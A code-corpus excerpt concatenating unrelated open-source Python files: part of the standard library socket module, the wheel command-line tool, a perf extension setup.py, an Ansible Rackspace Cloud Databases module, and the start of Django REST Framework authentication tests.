    the raw I/O interface on top of a socket object.
    """

    # One might wonder why not let FileIO do the job instead.  There are two
    # main reasons why FileIO is not adapted:
    # - it wouldn't work under Windows (where you can't use read() and
    #   write() on a socket handle)
    # - it wouldn't work with socket timeouts (FileIO would ignore the
    #   timeout and consider the socket non-blocking)

    # XXX More docs

    def __init__(self, sock, mode):
        if mode not in ("r", "w", "rw", "rb", "wb", "rwb"):
            raise ValueError("invalid mode: %r" % mode)
        io.RawIOBase.__init__(self)
        self._sock = sock
        # Normalize to a binary mode string; SocketIO always deals in bytes.
        if "b" not in mode:
            mode += "b"
        self._mode = mode
        self._reading = "r" in mode
        self._writing = "w" in mode
        # Once a timeout fires, further reads are refused (see readinto()).
        self._timeout_occurred = False

    def readinto(self, b):
        """Read up to len(b) bytes into the writable buffer *b* and return
        the number of bytes read.  If the socket is non-blocking and no bytes
        are available, None is returned.

        If *b* is non-empty, a 0 return value indicates that the connection
        was shutdown at the other end.
        """
        self._checkClosed()
        self._checkReadable()
        if self._timeout_occurred:
            raise IOError("cannot read from timed out object")
        while True:
            try:
                return self._sock.recv_into(b)
            except timeout:
                self._timeout_occurred = True
                raise
            except InterruptedError:
                # Retry the recv if it was interrupted by a signal.
                continue
            except error as e:
                if e.args[0] in _blocking_errnos:
                    # Non-blocking socket with no data available.
                    return None
                raise

    def write(self, b):
        """Write the given bytes or bytearray object *b* to the socket
        and return the number of bytes written.  This can be less than
        len(b) if not all data could be written.  If the socket is
        non-blocking and no bytes could be written None is returned.
        """
        self._checkClosed()
        self._checkWritable()
        try:
            return self._sock.send(b)
        except error as e:
            # XXX what about EINTR?
            if e.args[0] in _blocking_errnos:
                return None
            raise

    def readable(self):
        """True if the SocketIO is open for reading.
        """
        if self.closed:
            raise ValueError("I/O operation on closed socket.")
        return self._reading

    def writable(self):
        """True if the SocketIO is open for writing.
        """
        if self.closed:
            raise ValueError("I/O operation on closed socket.")
        return self._writing

    def seekable(self):
        """True if the SocketIO is open for seeking.
        """
        if self.closed:
            raise ValueError("I/O operation on closed socket.")
        return super().seekable()

    def fileno(self):
        """Return the file descriptor of the underlying socket.
        """
        self._checkClosed()
        return self._sock.fileno()

    @property
    def name(self):
        # Mirrors file objects: the fd while open, -1 after close.
        if not self.closed:
            return self.fileno()
        else:
            return -1

    @property
    def mode(self):
        return self._mode

    def close(self):
        """Close the SocketIO object.  This doesn't close the underlying
        socket, except if all references to it have disappeared.
        """
        if self.closed:
            return
        io.RawIOBase.close(self)
        # Drop this object's reference on the socket; the socket itself is
        # only really closed once every SocketIO/makefile reference is gone.
        self._sock._decref_socketios()
        self._sock = None
def getfqdn(name=''):
    """Get fully qualified domain name from name.

    An empty argument is interpreted as meaning the local host.

    First the hostname returned by gethostbyaddr() is checked, then
    possibly existing aliases.  In case no FQDN is available, hostname
    from gethostname() is returned.
    """
    name = name.strip()
    if not name or name == '0.0.0.0':
        name = gethostname()
    try:
        primary, aliases, _ipaddrs = gethostbyaddr(name)
    except error:
        # Resolution failed: hand back the (stripped) input unchanged.
        return name
    # Prefer the first name containing a dot; fall back to the primary name.
    for candidate in [primary] + aliases:
        if '.' in candidate:
            return candidate
    return primary
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
                      source_address=None):
    """Connect to *address* and return the socket object.

    Convenience function.  Connect to *address* (a 2-tuple ``(host,
    port)``) and return the socket object.  Passing the optional
    *timeout* parameter will set the timeout on the socket instance
    before attempting to connect.  If no *timeout* is supplied, the
    global default timeout setting returned by :func:`getdefaulttimeout`
    is used.  If *source_address* is set it must be a tuple of (host, port)
    for the socket to bind as a source address before making the connection.
    An host of '' or port 0 tells the OS to use the default.
    """

    host, port = address
    err = None
    # Try every address getaddrinfo() resolves for (host, port); remember the
    # last failure so it can be re-raised if no attempt succeeds.
    for res in getaddrinfo(host, port, 0, SOCK_STREAM):
        af, socktype, proto, canonname, sa = res
        sock = None
        try:
            sock = socket(af, socktype, proto)
            if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
                sock.settimeout(timeout)
            if source_address:
                sock.bind(source_address)
            sock.connect(sa)
            return sock

        except error as _:
            err = _
            # Close the partially set-up socket before trying the next address.
            if sock is not None:
                sock.close()

    if err is not None:
        raise err
    else:
        raise error("getaddrinfo returns an empty list")
| gpl-2.0 |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/wheel/tool/__init__.py | 238 | 13310 | """
Wheel command-line utility.
"""
import os
import hashlib
import sys
import json
import wheel.paths
from glob import iglob
from .. import signatures
from ..util import (urlsafe_b64decode, urlsafe_b64encode, native, binary,
matches_requirement)
from ..install import WheelFile
def require_pkgresources(name):
    """Abort with a RuntimeError naming *name* if pkg_resources is missing."""
    try:
        import pkg_resources  # noqa: F401 -- availability probe only
    except ImportError:
        message = "'{0}' needs pkg_resources (part of setuptools).".format(name)
        raise RuntimeError(message)
import argparse
class WheelError(Exception): pass
# For testability: keygen()/sign() take this as a default argument so tests can
# inject fakes.
def get_keyring():
    """Import the signing dependencies, returning (WheelKeys, keyring).

    Raises WheelError with an install hint when keyring/pyxdg are absent.
    """
    try:
        from ..signatures import keys
        import keyring
    except ImportError:
        raise WheelError("Install wheel[signatures] (requires keyring, pyxdg) for signatures.")
    return keys.WheelKeys, keyring
def keygen(get_keyring=get_keyring):
    """Generate a public/private key pair.

    Stores the secret key in the system keyring under the verify key, then
    registers the verify key as a trusted default ('+') signer.
    """
    WheelKeys, keyring = get_keyring()
    ed25519ll = signatures.get_ed25519ll()

    wk = WheelKeys().load()

    keypair = ed25519ll.crypto_sign_keypair()
    vk = native(urlsafe_b64encode(keypair.vk))
    sk = native(urlsafe_b64encode(keypair.sk))
    kr = keyring.get_keyring()
    kr.set_password("wheel", vk, sk)
    sys.stdout.write("Created Ed25519 keypair with vk={0}\n".format(vk))
    if isinstance(kr, keyring.backends.file.BaseKeyring):
        sys.stdout.write("in {0}\n".format(kr.file_path))
    else:
        sys.stdout.write("in %r\n" % kr.__class__)

    # Round-trip check: read the secret back to prove the keyring stored it.
    sk2 = kr.get_password('wheel', vk)
    if sk2 != sk:
        raise WheelError("Keyring is broken. Could not retrieve secret key.")

    sys.stdout.write("Trusting {0} to sign and verify all packages.\n".format(vk))
    wk.add_signer('+', vk)
    wk.trust('+', vk)
    wk.save()
def sign(wheelfile, replace=False, get_keyring=get_keyring):
    """Sign a wheel in place by appending RECORD.jws to its archive.

    Signs the sha256 of the wheel's RECORD with the first registered signer
    for the package name.
    """
    # NOTE(review): the 'replace' parameter is currently unused; re-signing an
    # already-signed wheel always raises below.
    WheelKeys, keyring = get_keyring()

    ed25519ll = signatures.get_ed25519ll()

    wf = WheelFile(wheelfile, append=True)
    wk = WheelKeys().load()

    name = wf.parsed_filename.group('name')
    sign_with = wk.signers(name)[0]
    sys.stdout.write("Signing {0} with {1}\n".format(name, sign_with[1]))

    # Rebuild the keypair from the keyring-stored secret for this verify key.
    vk = sign_with[1]
    kr = keyring.get_keyring()
    sk = kr.get_password('wheel', vk)
    keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)),
                                urlsafe_b64decode(binary(sk)))

    record_name = wf.distinfo_name + '/RECORD'
    sig_name = wf.distinfo_name + '/RECORD.jws'
    if sig_name in wf.zipfile.namelist():
        raise WheelError("Wheel is already signed.")
    record_data = wf.zipfile.read(record_name)
    payload = {"hash":"sha256=" + native(urlsafe_b64encode(hashlib.sha256(record_data).digest()))}
    sig = signatures.sign(payload, keypair)
    wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
    wf.zipfile.close()
def unsign(wheelfile):
    """
    Remove RECORD.jws from a wheel by truncating the zip file.

    RECORD.jws must be at the end of the archive.  The zip file must be an
    ordinary archive, with the compressed files and the directory in the same
    order, and without any non-zip content after the truncation point.
    """
    import wheel.install
    vzf = wheel.install.VerifyingZipFile(wheelfile, "a")
    info = vzf.infolist()
    if not (len(info) and info[-1].filename.endswith('/RECORD.jws')):
        raise WheelError("RECORD.jws not found at end of archive.")
    # pop() removes the final entry, truncating the archive (see docstring).
    vzf.pop()
    vzf.close()
def verify(wheelfile):
    """Verify a wheel.

    The signature will be verified for internal consistency ONLY and printed.
    Wheel's own unpack/install commands verify the manifest against the
    signature and file contents.
    """
    wf = WheelFile(wheelfile)
    sig_name = wf.distinfo_name + '/RECORD.jws'
    sig = json.loads(native(wf.zipfile.open(sig_name).read()))
    verified = signatures.verify(sig)
    # Diagnostics on stderr, the verified payload itself on stdout.
    sys.stderr.write("Signatures are internally consistent.\n")
    sys.stdout.write(json.dumps(verified, indent=2))
    sys.stdout.write('\n')
def unpack(wheelfile, dest='.'):
    """Unpack a wheel.

    Wheel content will be unpacked to {dest}/{name}-{ver}, where {name}
    is the package name and {ver} its version.

    :param wheelfile: The path to the wheel.
    :param dest: Destination directory (default to current directory).
    """
    archive = WheelFile(wheelfile)
    target = os.path.join(dest, archive.parsed_filename.group('namever'))
    sys.stderr.write("Unpacking to: %s\n" % (target,))
    archive.zipfile.extractall(target)
    archive.zipfile.close()
def install(requirements, requirements_file=None,
            wheel_dirs=None, force=False, list_files=False,
            dry_run=False):
    """Install wheels.

    :param requirements: A list of requirements or wheel files to install.
    :param requirements_file: A file containing requirements to install.
    :param wheel_dirs: A list of directories to search for wheels.
    :param force: Install a wheel file even if it is not compatible.
    :param list_files: Only list the files to install, don't install them.
    :param dry_run: Do everything but the actual install.
    """

    # If no wheel directories specified, use the WHEELPATH environment
    # variable, or the current directory if that is not set.
    if not wheel_dirs:
        wheelpath = os.getenv("WHEELPATH")
        if wheelpath:
            wheel_dirs = wheelpath.split(os.pathsep)
        else:
            wheel_dirs = [ os.path.curdir ]

    # Get a list of all valid wheels in wheel_dirs
    all_wheels = []
    for d in wheel_dirs:
        for w in os.listdir(d):
            if w.endswith('.whl'):
                wf = WheelFile(os.path.join(d, w))
                if wf.compatible:
                    all_wheels.append(wf)

    # If there is a requirements file, add it to the list of requirements
    if requirements_file:
        # If the file doesn't exist, search for it in wheel_dirs
        # This allows standard requirements files to be stored with the
        # wheels.
        if not os.path.exists(requirements_file):
            for d in wheel_dirs:
                name = os.path.join(d, requirements_file)
                if os.path.exists(name):
                    requirements_file = name
                    break

        with open(requirements_file) as fd:
            requirements.extend(fd)

    to_install = []
    for req in requirements:
        if req.endswith('.whl'):
            # Explicitly specified wheel filename
            if os.path.exists(req):
                wf = WheelFile(req)
                if wf.compatible or force:
                    to_install.append(wf)
                else:
                    msg = ("{0} is not compatible with this Python. "
                           "--force to install anyway.".format(req))
                    raise WheelError(msg)
            else:
                # We could search on wheel_dirs, but it's probably OK to
                # assume the user has made an error.
                raise WheelError("No such wheel file: {}".format(req))
            continue

        # We have a requirement spec
        # If we don't have pkg_resources, this will raise an exception
        matches = matches_requirement(req, all_wheels)
        if not matches:
            raise WheelError("No match for requirement {}".format(req))
        # max() relies on WheelFile ordering — presumably highest version
        # wins; confirm against wheel.install.WheelFile comparison methods.
        to_install.append(max(matches))

    # We now have a list of wheels to install
    if list_files:
        sys.stdout.write("Installing:\n")

    if dry_run:
        return

    for wf in to_install:
        if list_files:
            sys.stdout.write("    {0}\n".format(wf.filename))
            continue
        wf.install(force=force)
        wf.zipfile.close()
def install_scripts(distributions):
    """
    Regenerate the entry_points console_scripts for the named distribution.
    """
    try:
        from setuptools.command import easy_install
        import pkg_resources
    except ImportError:
        raise RuntimeError("'wheel install_scripts' needs setuptools.")

    for dist in distributions:
        pkg_resources_dist = pkg_resources.get_distribution(dist)
        install = wheel.paths.get_install_command(dist)
        # Reuse setuptools' easy_install machinery just for script generation.
        command = easy_install.easy_install(install.distribution)
        command.args = ['wheel'] # dummy argument
        command.finalize_options()
        command.install_egg_scripts(pkg_resources_dist)
def convert(installers, dest_dir, verbose):
    """Convert egg or wininst installer globs to wheels in *dest_dir*."""
    require_pkgresources('wheel convert')

    # Only support wheel convert if pkg_resources is present
    from ..wininst2wheel import bdist_wininst2wheel
    from ..egg2wheel import egg2wheel

    for pat in installers:
        for installer in iglob(pat):
            # Pick the converter by file extension: .egg vs bdist_wininst .exe.
            if os.path.splitext(installer)[1] == '.egg':
                conv = egg2wheel
            else:
                conv = bdist_wininst2wheel
            if verbose:
                sys.stdout.write("{0}... ".format(installer))
                sys.stdout.flush()
            conv(installer, dest_dir)
            if verbose:
                sys.stdout.write("OK\n")
def parser():
    """Build the argparse command-line parser: one sub-command per tool.

    Each sub-command stores its handler on args.func via set_defaults();
    main() dispatches on that attribute.
    """
    p = argparse.ArgumentParser()
    s = p.add_subparsers(help="commands")

    def keygen_f(args):
        keygen()
    keygen_parser = s.add_parser('keygen', help='Generate signing key')
    keygen_parser.set_defaults(func=keygen_f)

    def sign_f(args):
        sign(args.wheelfile)
    sign_parser = s.add_parser('sign', help='Sign wheel')
    sign_parser.add_argument('wheelfile', help='Wheel file')
    sign_parser.set_defaults(func=sign_f)

    def unsign_f(args):
        unsign(args.wheelfile)
    unsign_parser = s.add_parser('unsign', help=unsign.__doc__)
    unsign_parser.add_argument('wheelfile', help='Wheel file')
    unsign_parser.set_defaults(func=unsign_f)

    def verify_f(args):
        verify(args.wheelfile)
    verify_parser = s.add_parser('verify', help=verify.__doc__)
    verify_parser.add_argument('wheelfile', help='Wheel file')
    verify_parser.set_defaults(func=verify_f)

    def unpack_f(args):
        unpack(args.wheelfile, args.dest)
    unpack_parser = s.add_parser('unpack', help='Unpack wheel')
    unpack_parser.add_argument('--dest', '-d', help='Destination directory',
                               default='.')
    unpack_parser.add_argument('wheelfile', help='Wheel file')
    unpack_parser.set_defaults(func=unpack_f)

    def install_f(args):
        install(args.requirements, args.requirements_file,
                args.wheel_dirs, args.force, args.list_files)
    install_parser = s.add_parser('install', help='Install wheels')
    install_parser.add_argument('requirements', nargs='*',
                                help='Requirements to install.')
    install_parser.add_argument('--force', default=False,
                                action='store_true',
                                help='Install incompatible wheel files.')
    install_parser.add_argument('--wheel-dir', '-d', action='append',
                                dest='wheel_dirs',
                                help='Directories containing wheels.')
    install_parser.add_argument('--requirements-file', '-r',
                                help="A file containing requirements to "
                                "install.")
    install_parser.add_argument('--list', '-l', default=False,
                                dest='list_files',
                                action='store_true',
                                help="List wheels which would be installed, "
                                "but don't actually install anything.")
    install_parser.set_defaults(func=install_f)

    def install_scripts_f(args):
        install_scripts(args.distributions)
    install_scripts_parser = s.add_parser('install-scripts', help='Install console_scripts')
    install_scripts_parser.add_argument('distributions', nargs='*',
                                        help='Regenerate console_scripts for these distributions')
    install_scripts_parser.set_defaults(func=install_scripts_f)

    def convert_f(args):
        convert(args.installers, args.dest_dir, args.verbose)
    convert_parser = s.add_parser('convert', help='Convert egg or wininst to wheel')
    convert_parser.add_argument('installers', nargs='*', help='Installers to convert')
    convert_parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
                                help="Directory to store wheels (default %(default)s)")
    convert_parser.add_argument('--verbose', '-v', action='store_true')
    convert_parser.set_defaults(func=convert_f)

    def version_f(args):
        from .. import __version__
        sys.stdout.write("wheel %s\n" % __version__)
    version_parser = s.add_parser('version', help='Print version and exit')
    version_parser.set_defaults(func=version_f)

    def help_f(args):
        p.print_help()
    help_parser = s.add_parser('help', help='Show this help')
    help_parser.set_defaults(func=help_f)

    return p
def main():
    """Parse the command line and dispatch to the chosen sub-command.

    Returns a process exit code: 0 on success, 1 when a WheelError is
    raised by the handler (None when no sub-command was given).
    """
    p = parser()
    args = p.parse_args()
    if not hasattr(args, 'func'):
        p.print_help()
    else:
        # XXX on Python 3.3 we get 'args has no func' rather than short help.
        try:
            args.func(args)
            return 0
        except WheelError as e:
            # Fix: BaseException.message does not exist on Python 3 (it was
            # deprecated by PEP 352 and removed); str(e) works on both 2 and 3.
            sys.stderr.write(str(e) + "\n")
            return 1
| mit |
bq/aquaris-M4.5 | tools/perf/util/setup.py | 989 | 1543 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
    # Redirect distutils build output to the directories supplied by the
    # environment (PYTHON_EXTBUILD_LIB / PYTHON_EXTBUILD_TMP, read below into
    # the module-level build_lib / build_tmp).
    def finalize_options(self):
        _build_ext.finalize_options(self)
        self.build_lib  = build_lib
        self.build_temp = build_tmp
class install_lib(_install_lib):
    # Install straight out of the externally-provided build directory.
    def finalize_options(self):
        _install_lib.finalize_options(self)
        self.build_dir = build_lib
cflags = getenv('CFLAGS', '').split()
# switch off several checks (need to be at the end of cflags list)
cflags += ['-fno-strict-aliasing', '-Wno-write-strings', '-Wno-unused-parameter' ]

# Build locations and link objects are handed in by the perf Makefile.
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
libapikfs = getenv('LIBAPIKFS')

# Fix: use open() instead of the Python-2-only file() builtin, and a with
# block so the source-list file is closed deterministically (the original
# leaked the file handle).
with open('util/python-ext-sources') as src_list:
    ext_sources = [f.strip() for f in src_list
                   if len(f.strip()) > 0 and f[0] != '#']

perf = Extension('perf',
		  sources = ext_sources,
		  include_dirs = ['util/include'],
		  extra_compile_args = cflags,
		  extra_objects = [libtraceevent, libapikfs],
                 )

setup(name='perf',
      version='0.1',
      description='Interface with the Linux profiling infrastructure',
      author='Arnaldo Carvalho de Melo',
      author_email='acme@redhat.com',
      license='GPLv2',
      url='http://perf.wiki.kernel.org',
      ext_modules=[perf],
      cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
alvaroaleman/ansible-modules-core | cloud/rackspace/rax_cdb.py | 51 | 8115 | #!/usr/bin/python -tt
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_cdb
short_description: create/delete or resize a Rackspace Cloud Databases instance
description:
- creates / deletes or resize a Rackspace Cloud Databases instance
and optionally waits for it to be 'running'. The name option needs to be
unique since it's used to identify the instance.
version_added: "1.8"
options:
name:
description:
- Name of the databases server instance
default: null
flavor:
description:
- flavor to use for the instance 1 to 6 (i.e. 512MB to 16GB)
default: 1
volume:
description:
- Volume size of the database 1-150GB
default: 2
cdb_type:
description:
- type of instance (i.e. MySQL, MariaDB, Percona)
default: MySQL
version_added: "2.0"
aliases: ['type']
cdb_version:
description:
- version of database (MySQL supports 5.1 and 5.6, MariaDB supports 10, Percona supports 5.6)
choices: ['5.1', '5.6', '10']
version_added: "2.0"
aliases: ['version']
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
wait:
description:
- wait for the instance to be in state 'running' before returning
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author: "Simon JAILLET (@jails)"
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: Build a Cloud Databases
gather_facts: False
tasks:
- name: Server build request
local_action:
module: rax_cdb
credentials: ~/.raxpub
region: IAD
name: db-server1
flavor: 1
volume: 2
cdb_type: MySQL
cdb_version: 5.6
wait: yes
state: present
register: rax_db_server
'''
# pyrax is optional at import time so Ansible can load the module and report a
# clean error; main() checks HAS_PYRAX and fail_json()s when it is missing.
try:
    import pyrax
    HAS_PYRAX = True
except ImportError:
    HAS_PYRAX = False
def find_instance(name):
    """Return the cloud-databases instance named *name*, or False if absent."""
    existing = pyrax.cloud_databases.list()
    for candidate in existing or []:
        if candidate.name == name:
            return candidate
    return False
def save_instance(module, name, flavor, volume, cdb_type, cdb_version, wait,
                  wait_timeout):
    """Create a new instance, or resize an existing one, then exit the module.

    Exits via module.exit_json() on success or module.fail_json() on any
    validation or API error (both terminate the process under Ansible).
    """
    # Fix: .items() instead of the Python-2-only .iteritems() so the module
    # also runs under Python 3; behavior is identical.
    for arg, value in dict(name=name, flavor=flavor,
                           volume=volume, type=cdb_type, version=cdb_version
                           ).items():
        if not value:
            module.fail_json(msg='%s is required for the "rax_cdb"'
                                 ' module' % arg)

    # Idiom: chained comparison instead of not(a and b).
    if not 1 <= volume <= 150:
        module.fail_json(msg='volume is required to be between 1 and 150')

    cdb = pyrax.cloud_databases

    # Idiom: list comprehension instead of an append loop.
    flavors = [item.id for item in cdb.list_flavors()]

    if flavor not in flavors:
        module.fail_json(msg='unexisting flavor reference "%s"' % str(flavor))

    changed = False

    instance = find_instance(name)

    if not instance:
        action = 'create'
        try:
            instance = cdb.create(name=name, flavor=flavor, volume=volume,
                                  type=cdb_type, version=cdb_version)
        except Exception as e:
            # Fix: str(e) instead of e.message (removed in Python 3).
            module.fail_json(msg='%s' % str(e))
        else:
            changed = True

    else:
        action = None

        # Volume can only grow; the API rejects shrinking, so fail early.
        if instance.volume.size != volume:
            action = 'resize'
            if instance.volume.size > volume:
                module.fail_json(changed=False, action=action,
                                 msg='The new volume size must be larger than '
                                     'the current volume size',
                                 cdb=rax_to_dict(instance))
            instance.resize_volume(volume)
            changed = True

        if int(instance.flavor.id) != flavor:
            action = 'resize'
            # The instance must be ACTIVE before a flavor resize is accepted.
            pyrax.utils.wait_until(instance, 'status', 'ACTIVE',
                                   attempts=wait_timeout)
            instance.resize(flavor)
            changed = True

    if wait:
        pyrax.utils.wait_until(instance, 'status', 'ACTIVE',
                               attempts=wait_timeout)

    if wait and instance.status != 'ACTIVE':
        module.fail_json(changed=changed, action=action,
                         cdb=rax_to_dict(instance),
                         msg='Timeout waiting for "%s" databases instance to '
                             'be created' % name)

    module.exit_json(changed=changed, action=action, cdb=rax_to_dict(instance))
def delete_instance(module, name, wait, wait_timeout):
    """Delete the instance named *name*, optionally waiting for SHUTDOWN.

    Exits the module via exit_json()/fail_json(); idempotent when the
    instance is already gone.
    """
    if not name:
        module.fail_json(msg='name is required for the "rax_cdb" module')

    changed = False

    instance = find_instance(name)
    if not instance:
        # Nothing to do: report no change rather than failing.
        module.exit_json(changed=False, action='delete')

    try:
        instance.delete()
    except Exception as e:
        # NOTE(review): e.message is Python-2-only; str(e) would be portable.
        module.fail_json(msg='%s' % e.message)
    else:
        changed = True

    if wait:
        pyrax.utils.wait_until(instance, 'status', 'SHUTDOWN',
                               attempts=wait_timeout)

    if wait and instance.status != 'SHUTDOWN':
        module.fail_json(changed=changed, action='delete',
                         cdb=rax_to_dict(instance),
                         msg='Timeout waiting for "%s" databases instance to '
                             'be deleted' % name)

    module.exit_json(changed=changed, action='delete',
                     cdb=rax_to_dict(instance))
def rax_cdb(module, state, name, flavor, volume, cdb_type, cdb_version, wait,
            wait_timeout):
    """Dispatch on *state*: create/resize for 'present', remove for 'absent'."""
    if state == 'absent':
        delete_instance(module, name, wait, wait_timeout)
    elif state == 'present':
        save_instance(module, name, flavor, volume, cdb_type, cdb_version,
                      wait, wait_timeout)
def main():
    """Ansible entry point: build the argument spec, validate, and dispatch."""
    argument_spec = rax_argument_spec()
    argument_spec.update(
        dict(
            name=dict(type='str', required=True),
            flavor=dict(type='int', default=1),
            volume=dict(type='int', default=2),
            cdb_type=dict(type='str', default='MySQL', aliases=['type']),
            cdb_version=dict(type='str', default='5.6', aliases=['version']),
            state=dict(default='present', choices=['present', 'absent']),
            wait=dict(type='bool', default=False),
            wait_timeout=dict(type='int', default=300),
        )
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=rax_required_together(),
    )

    # Fail cleanly when the optional pyrax dependency was not importable.
    if not HAS_PYRAX:
        module.fail_json(msg='pyrax is required for this module')

    name = module.params.get('name')
    flavor = module.params.get('flavor')
    volume = module.params.get('volume')
    cdb_type = module.params.get('cdb_type')
    cdb_version = module.params.get('cdb_version')
    state = module.params.get('state')
    wait = module.params.get('wait')
    wait_timeout = module.params.get('wait_timeout')

    # Authenticate pyrax with the module's credentials before any API call.
    setup_rax_module(module, pyrax)
    rax_cdb(module, state, name, flavor, volume, cdb_type, cdb_version, wait, wait_timeout)
# Ansible module boilerplate: these star-imports inject AnsibleModule and the
# rax_* helpers (rax_argument_spec, setup_rax_module, rax_to_dict, ...) used above.
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *

# invoke the module
main()
| gpl-3.0 |
iheitlager/django-rest-framework | tests/test_authentication.py | 75 | 12845 | # coding: utf-8
from __future__ import unicode_literals
import base64
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from rest_framework import (
HTTP_HEADER_ENCODING, exceptions, permissions, renderers, status
)
from rest_framework.authentication import (
BaseAuthentication, BasicAuthentication, SessionAuthentication,
TokenAuthentication
)
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework.test import APIClient, APIRequestFactory
from rest_framework.views import APIView
factory = APIRequestFactory()
class MockView(APIView):
    """Minimal authenticated view used as the target for every auth test."""
    permission_classes = (permissions.IsAuthenticated,)

    def get(self, request):
        return HttpResponse({'a': 1, 'b': 2, 'c': 3})

    def post(self, request):
        return HttpResponse({'a': 1, 'b': 2, 'c': 3})

    def put(self, request):
        return HttpResponse({'a': 1, 'b': 2, 'c': 3})
# One route per authentication scheme under test, plus the token-obtain
# endpoint (dotted-string view reference) and DRF's bundled login views.
urlpatterns = [
    url(r'^session/$', MockView.as_view(authentication_classes=[SessionAuthentication])),
    url(r'^basic/$', MockView.as_view(authentication_classes=[BasicAuthentication])),
    url(r'^token/$', MockView.as_view(authentication_classes=[TokenAuthentication])),
    url(r'^auth-token/$', 'rest_framework.authtoken.views.obtain_auth_token'),
    url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')),
]
class BasicAuthTests(TestCase):
    """Basic authentication"""
    urls = 'tests.test_authentication'

    def setUp(self):
        self.csrf_client = APIClient(enforce_csrf_checks=True)
        self.username = 'john'
        self.email = 'lennon@thebeatles.com'
        self.password = 'password'
        self.user = User.objects.create_user(self.username, self.email, self.password)

    def _basic_auth_header(self):
        # DRY: both passing tests previously duplicated this base64
        # 'user:pass' header construction inline.
        credentials = ('%s:%s' % (self.username, self.password))
        base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
        return 'Basic %s' % base64_credentials

    def test_post_form_passing_basic_auth(self):
        """Ensure POSTing json over basic auth with correct credentials passes and does not require CSRF"""
        auth = self._basic_auth_header()
        response = self.csrf_client.post('/basic/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_post_json_passing_basic_auth(self):
        """Ensure POSTing form over basic auth with correct credentials passes and does not require CSRF"""
        auth = self._basic_auth_header()
        response = self.csrf_client.post('/basic/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_post_form_failing_basic_auth(self):
        """Ensure POSTing form over basic auth without correct credentials fails"""
        response = self.csrf_client.post('/basic/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_post_json_failing_basic_auth(self):
        """Ensure POSTing json over basic auth without correct credentials fails"""
        response = self.csrf_client.post('/basic/', {'example': 'example'}, format='json')
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(response['WWW-Authenticate'], 'Basic realm="api"')
class SessionAuthTests(TestCase):
    """User session authentication, including CSRF enforcement behaviour."""
    urls = 'tests.test_authentication'

    def setUp(self):
        # Two clients: one that enforces CSRF checks, one that does not.
        self.csrf_client = APIClient(enforce_csrf_checks=True)
        self.non_csrf_client = APIClient(enforce_csrf_checks=False)
        self.username = 'john'
        self.email = 'lennon@thebeatles.com'
        self.password = 'password'
        self.user = User.objects.create_user(self.username, self.email, self.password)

    def tearDown(self):
        self.csrf_client.logout()

    def test_login_view_renders_on_get(self):
        """
        Ensure the login template renders for a basic GET.

        cf. [#1810](https://github.com/tomchristie/django-rest-framework/pull/1810)
        """
        response = self.csrf_client.get('/auth/login/')
        self.assertContains(response, '<label for="id_username">Username:</label>')

    def test_post_form_session_auth_failing_csrf(self):
        """
        Ensure POSTing form over session authentication without CSRF token fails.
        """
        self.csrf_client.login(username=self.username, password=self.password)
        response = self.csrf_client.post('/session/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_post_form_session_auth_passing(self):
        """
        Ensure POSTing form over session authentication with logged in user and CSRF token passes.
        """
        self.non_csrf_client.login(username=self.username, password=self.password)
        response = self.non_csrf_client.post('/session/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_put_form_session_auth_passing(self):
        """
        Ensure PUTting form over session authentication with logged in user and CSRF token passes.
        """
        self.non_csrf_client.login(username=self.username, password=self.password)
        response = self.non_csrf_client.put('/session/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_post_form_session_auth_failing(self):
        """
        Ensure POSTing form over session authentication without logged in user fails.
        """
        response = self.csrf_client.post('/session/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TokenAuthTests(TestCase):
    """Token authentication, plus the obtain-auth-token login endpoint."""
    urls = 'tests.test_authentication'

    def setUp(self):
        self.csrf_client = APIClient(enforce_csrf_checks=True)
        self.username = 'john'
        self.email = 'lennon@thebeatles.com'
